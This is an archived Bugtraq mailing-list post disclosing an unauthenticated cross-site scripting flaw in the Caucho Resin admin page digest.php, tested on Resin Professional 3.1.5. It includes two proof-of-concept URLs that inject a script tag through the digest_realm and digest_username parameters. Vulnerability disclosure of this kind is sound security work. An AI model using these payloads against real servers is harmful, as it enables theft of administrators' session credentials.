[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Caucho Technology Resin digest.php Cross Site Scripting Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Caucho Technology Resin digest.php Cross Site Scripting Vulnerability
From: xuanmumu@xxxxxxxxx
Date: 18 May 2010 23:18:12 -0000

This vulnerability do not need to login.digest.php use the REQUEST method in a 
wrong way to accept parameters&#65292;the malicious user could submit xss code 
on this page and an attacker could use this vulnerability to steal the victim's 
cookie-based authentication credentials.

exp:

http://test.com/resin-admin/digest.php?digest_attempt=1&digest_realm=";><script>alert("ZnVjayBjbnZk")</script><a&digest_username[]=
http://test.com/resin-admin/digest.php?digest_attempt=1&digest_username=";><script>alert("ZnVjayBjbnZk")</script><a

Test on Resin Professional 3.1.5

Prev by Date: Metasploit Framework 3.4.0 Released
Next by Date: The New ISO Hacking Standard
Previous by thread: Metasploit Framework 3.4.0 Released
Next by thread: The New ISO Hacking Standard
Index(es):
- Date
- Thread